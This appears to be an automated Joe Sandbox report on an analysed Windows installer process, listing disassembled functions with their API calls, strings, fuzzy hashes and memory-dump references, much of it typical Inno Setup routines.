DeleteMenu.USER32(00000000,0000F030,00000000,00410718,00000000,00410718,000000FC,00423754,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423A47
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410718,00000000,00410718,000000FC,00423754,00000000,00400000,00000000,00000000,00000000), ref: 00423A54
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410718,00000000,00410718,000000FC,00423754,00000000,00400000), ref: 00423A6A

Strings

D7B, xrefs: 0042395B, 004239DC

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
String ID: D7B
API String ID: 183575631-2147974278
Opcode ID: 2a8e1888e4b6b9560ea8b686cbe2eec1ee698867986e389d75447a92090c7769
Instruction ID: 5219bf6c13a88e3142c9546b93115ce75b520d7afdd4625736ccdd501c9f07f0
Opcode Fuzzy Hash: 2a8e1888e4b6b9560ea8b686cbe2eec1ee698867986e389d75447a92090c7769
Instruction Fuzzy Hash: A03152B17412106AEB10BF69DC82F6A33989B04709F60057EBA41FF2D3D9BDE940876D

Uniqueness

Uniqueness Score: -1.00%

Function 00472410 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CAD5550.KERNEL32(73930000,SHGetFolderPathA,00000000,0047254B), ref: 00472512

Strings

_isetup\_shfoldr.dll, xrefs: 00472442
SHFOLDERDLL, xrefs: 0047244F
Failed to get version numbers of _shfoldr.dll, xrefs: 00472468
Failed to load DLL "%s", xrefs: 004724F5
shell32.dll, xrefs: 004724BD
Failed to get address of SHGetFolderPathA function, xrefs: 00472523
SHGetFolderPathA, xrefs: 00472507
shfolder.dll, xrefs: 00472475, 004724AE

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550
String ID: Failed to get address of SHGetFolderPathA function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
API String ID: 183293030-1072092678
Opcode ID: 507d2e34d75453d9ba4edf67155abcdbb15b4d83a88131d6658f2487126d67d1
Instruction ID: df0b9b8973acef26d11fc0e839acdfe1f99da3c95b5516bf9a2c59f45464ce8d
Opcode Fuzzy Hash: 507d2e34d75453d9ba4edf67155abcdbb15b4d83a88131d6658f2487126d67d1
Instruction Fuzzy Hash: 89313E70A00109AFDB10EFE5CAD19DEB7B4EB45304F50C86AE418E7351D7B8AE458B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00453748 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,COMMAND.COM" /C ,?,004539C8,004539C8,?,004539C8,00000000,004539AC,?,?,?,00000001), ref: 004538A7

Part of subcall function 0042D7E0: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00452670,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000,00000000,?,0048AF5D), ref: 0042D7F3

6CF47180.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000000,00000000,00000000,?,?,00000000,00453924,?,?,COMMAND.COM" /C ,?), ref: 004538E9
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000000,00000000,00000000,?,?,00000000,00453924,?,?,COMMAND.COM" /C ,?), ref: 004538FD

Strings

.bat, xrefs: 004537B7
COMMAND.COM" /C , xrefs: 0045383B
D, xrefs: 0045386F
cmd.exe" /C ", xrefs: 00453804
.cmd, xrefs: 004537D2

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLast$DirectoryF47180Windows
String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
API String ID: 722225226-615399546
Opcode ID: 33a27229c5421f9eb213ab82141ae6c2ed946a67f5f54968f9def354b9b6ad90
Instruction ID: 45a4ecfcdb078bc0f7abb9b0e49dfa18ec6bbc905d94cc9751c1a491fcbe52ad
Opcode Fuzzy Hash: 33a27229c5421f9eb213ab82141ae6c2ed946a67f5f54968f9def354b9b6ad90
Instruction Fuzzy Hash: 4C5149B1A043096BDB01EF95C841BDEBBB8DF48746F50846BFC04A7292D67C9B49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00451C94 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CB4
6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CBA
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CCE
6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CD4

Strings

kernel32.dll, xrefs: 00451CAF, 00451CC9
Wow64DisableWow64FsRedirection, xrefs: 00451CAA
shell32.dll, xrefs: 00451D00
Wow64RevertWow64FsRedirection, xrefs: 00451CC4

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550HandleModule
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 920177481-2130885113
Opcode ID: b0dbd32f029cef76fb5d07cae0c51c53217107397ee6571f7debf362de99bad9
Instruction ID: c05cca7271ab2d20bbdb9796339364bf3a64628684ebd0e6fdc7bf04ba31f4de
Opcode Fuzzy Hash: b0dbd32f029cef76fb5d07cae0c51c53217107397ee6571f7debf362de99bad9
Instruction Fuzzy Hash: 87015E34641A44AED711AB669C52B6A3B78D714755F600C3BFC019A1A3DABD580C8E2D

Uniqueness

Uniqueness Score: -1.00%

Function 0042FE58 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23
registryclipboardthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterClipboardFormatA.USER32 ref: 0042FE60
RegisterClipboardFormatA.USER32 ref: 0042FE6F
GetCurrentThreadId.KERNEL32 ref: 0042FE89
GlobalAddAtomA.KERNEL32 ref: 0042FEAA

Strings

commdlg_FindReplace, xrefs: 0042FE6A
WndProcPtr%.8X%.8X, xrefs: 0042FE9B
commdlg_help, xrefs: 0042FE5B

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
API String ID: 4130936913-2943970505
Opcode ID: 003ea68ac1ad5bea44618dcb6fbfd8367869354155694a8be84db00a992ef707
Instruction ID: 26ec79deaeb706fa9e15f0cb387365e7e20004fa16731b1cb17c3df66d937657
Opcode Fuzzy Hash: 003ea68ac1ad5bea44618dcb6fbfd8367869354155694a8be84db00a992ef707
Instruction Fuzzy Hash: D4F089745183948AD700FB75D84271D77E0AB44708F800A7FF548A62F2E7789504CB2F

Uniqueness

Uniqueness Score: -1.00%

Function 00423754 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32 ref: 004237E4
GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004190AE,00000000,?,?,00000001,00000000), ref: 00423811
OemToCharA.USER32 ref: 00423824
CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004190AE,00000000,?,?,00000001), ref: 00423864

Strings

MAINICON, xrefs: 004237D9
2, xrefs: 004237B2

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: 2$MAINICON
API String ID: 3935243913-3181700818
Opcode ID: f7a56db4cabb1daef0da93b146ca5530922bdfff8d5698d8e92f9da91eae2645
Instruction ID: 1f087940b372d7f1725fe83f28a731a6464074f4c0731806c41e3fd0f529a594
Opcode Fuzzy Hash: f7a56db4cabb1daef0da93b146ca5530922bdfff8d5698d8e92f9da91eae2645
Instruction Fuzzy Hash: B8319170A042449ADB10EF69C8C57C97BE8AF15308F4441BAE844DF393D7BED988CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00419000 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 00419005
GlobalAddAtomA.KERNEL32 ref: 00419026
GetCurrentThreadId.KERNEL32 ref: 00419041
GlobalAddAtomA.KERNEL32 ref: 00419062

Part of subcall function 00423190: 72E5AC50.USER32(00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001,00000000), ref: 004231E6
Part of subcall function 00423190: EnumFontsA.GDI32(00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001,00000000), ref: 004231F9
Part of subcall function 00423190: 72E5AD70.GDI32(00000000,0000005A,00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001), ref: 00423201
Part of subcall function 00423190: 72E5B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000), ref: 0042320C

Part of subcall function 00423754: LoadIconA.USER32 ref: 004237E4
Part of subcall function 00423754: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004190AE,00000000,?,?,00000001,00000000), ref: 00423811
Part of subcall function 00423754: OemToCharA.USER32 ref: 00423824
Part of subcall function 00423754: CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004190AE,00000000,?,?,00000001), ref: 00423864

Part of subcall function 0041F1E0: GetVersion.KERNEL32(?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F1EE
Part of subcall function 0041F1E0: SetErrorMode.KERNEL32(00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F20A
Part of subcall function 0041F1E0: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F216
Part of subcall function 0041F1E0: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F224
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dRegister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F254
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F27D
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F292
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F2A7
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F2BC
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001), ref: 0041F2D1
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000), ref: 0041F2E6
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8), ref: 0041F2FB
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister), ref: 0041F310
Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,BtnWndProc3d,00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl), ref: 0041F325

Strings

Delphi%.8X, xrefs: 00419017
ControlOfs%.8X%.8X, xrefs: 00419053

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550$AtomCharCurrentErrorGlobalLoadMode$B380EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
String ID: ControlOfs%.8X%.8X$Delphi%.8X
API String ID: 293255337-2767913252
Opcode ID: b7f9bbeb3c60c5cd610354d66e429f187f1188d2ad776fc62a728a79e0fe9ed2
Instruction ID: 43a8d0485271cdf29850ede6b3e0bb29e96d7f982bc1287e513e001800c06e39
Opcode Fuzzy Hash: b7f9bbeb3c60c5cd610354d66e429f187f1188d2ad776fc62a728a79e0fe9ed2
Instruction Fuzzy Hash: C711FE70A092809AC740FF7A988664E77D09B9830CF40893FF548BB3E1DB7999458B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00413704 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32 ref: 0041372C
GetWindowLongA.USER32 ref: 00413737
GetWindowLongA.USER32 ref: 00413749
SetWindowLongA.USER32 ref: 0041375C
SetPropA.USER32 ref: 00413773
SetPropA.USER32 ref: 0041378A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: c6d8841ac761625ea1a08a171b6c7f9a9a5b30f625edd39c9678ca1475cce204
Instruction ID: 17f789917bd6404cc509f75547e6dc433186a7dca0d07f336397386fd0c13113
Opcode Fuzzy Hash: c6d8841ac761625ea1a08a171b6c7f9a9a5b30f625edd39c9678ca1475cce204
Instruction Fuzzy Hash: 2611CEB5601148BFDB00EF99DC84E9A3BE9AB08354F10866AFE18DB2E1D735D9508B64

Uniqueness

Uniqueness Score: -1.00%

Function 00453E7C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 141registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454013,?,00000000,00454053), ref: 00453F59

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00453EDC
WININIT.INI, xrefs: 00453F88
PendingFileRenameOperations2, xrefs: 00453F28
PendingFileRenameOperations, xrefs: 00453EF8

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6790
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
API String ID: 3513276378-2199428270
Opcode ID: 1445041b127030f601f5f475d0f81f462f3f7857b8dd74538295b2e9aeb85ebb
Instruction ID: 7ba13c9c2ff66a0e977248546e57251473cb921e98e5fc860cbc8d5f373c0d82
Opcode Fuzzy Hash: 1445041b127030f601f5f475d0f81f462f3f7857b8dd74538295b2e9aeb85ebb
Instruction Fuzzy Hash: 1F51F930E002089BDB10EF61DC51ADEB7B9EF84708F60817BF904A72D2DB799E45CA18

Uniqueness

Uniqueness Score: -1.00%

Function 004610DC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115windowCOMMON

Download Yara Rule

APIs

SHGetFileInfo.SHELL32([rG,00000010,?,00000160,00001010), ref: 00461179
ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046119F

Part of subcall function 0046101C: DrawIconEx.USER32 ref: 004610B4
Part of subcall function 0046101C: DestroyCursor.USER32(00000000), ref: 004610CA

SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 004611FB
ExtractIconA.SHELL32(00400000,00000000,?), ref: 00461221

Strings

[rG, xrefs: 004610E7, 00461174

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Icon$ExtractFileInfo$CursorDestroyDraw
String ID: [rG
API String ID: 2926980410-1780078340
Opcode ID: 1f42779bc9d7f459df7c4a952db4a5d2d9c1b39d754ee803a783439597452981
Instruction ID: 43efc87ec513c33b4470f0c42580a1d3a797498daa76b4594f75f2d001bc2c3a
Opcode Fuzzy Hash: 1f42779bc9d7f459df7c4a952db4a5d2d9c1b39d754ee803a783439597452981
Instruction Fuzzy Hash: 27416D74600248AFDB10DF65CD9AFDEB7E8EB49304F1481A6F904E7391D678AE80CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0047225C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004723B2,?,?,?,?,00000000,00000000,?,0048A000,00000005,?,00000000,00489F25), ref: 004722EF
GetLastError.KERNEL32(00000000,00000000,00000000,004723B2,?,?,?,?,00000000,00000000,?,0048A000,00000005,?,00000000,00489F25), ref: 004722F8

Strings

Created temporary directory: , xrefs: 00472291
\_setup64.tmp, xrefs: 0047236A
_isetup, xrefs: 004722DA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $\_setup64.tmp$_isetup
API String ID: 1375471231-2952887711
Opcode ID: d4e5f0a15b5712561890722fd7a3cf30839d0f46d90f646290125f0554c3378f
Instruction ID: 6b17bfcab048c2f4aa4ef564a62664cf3a994c609fd9f7540fc313dadf2ad4ec
Opcode Fuzzy Hash: d4e5f0a15b5712561890722fd7a3cf30839d0f46d90f646290125f0554c3378f
Instruction Fuzzy Hash: 79414674A002199BDB10EFA5C981ADEB7B5EF44304F50847BE810B7392D67CAE45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00423B4C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00423AE4), ref: 00423B70
GetWindow.USER32(?,00000003), ref: 00423B85
GetWindowLongA.USER32 ref: 00423B94
SetWindowPos.USER32(00000000,$BB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,00424273,?,?,00423E3B), ref: 00423BCA

Strings

$BB, xrefs: 00423BBA, 00423BBE

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID: $BB
API String ID: 4191631535-2593667605
Opcode ID: d6e0cba7910d819887bb3b6b5c2b8e697feec83489dcab8192dc57f6bf28c793
Instruction ID: ebb4f15abd13bc88932ccb723061018f00c5171692ad1176cd7ff3742fecbb00
Opcode Fuzzy Hash: d6e0cba7910d819887bb3b6b5c2b8e697feec83489dcab8192dc57f6bf28c793
Instruction Fuzzy Hash: ED111870744624ABDA10AF28D885F5677E8AB08725F11066AF954EB2E2C378AD41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042DCDC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32(?,?), ref: 0042DCE8
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE6B,00000000,0042DE83,?,?,?,?), ref: 0042DD03
6CAD5550.KERNEL32(00000000,advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE6B,00000000,0042DE83,?,?,?,?), ref: 0042DD09

Strings

RegDeleteKeyExA, xrefs: 0042DCF9
advapi32.dll, xrefs: 0042DCFE

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550DeleteHandleModule
String ID: RegDeleteKeyExA$advapi32.dll
API String ID: 470921693-1846899949
Opcode ID: fba564e9f5f9f210018b68d7ed56646b15d5308277a25301db98864e6a1c2157
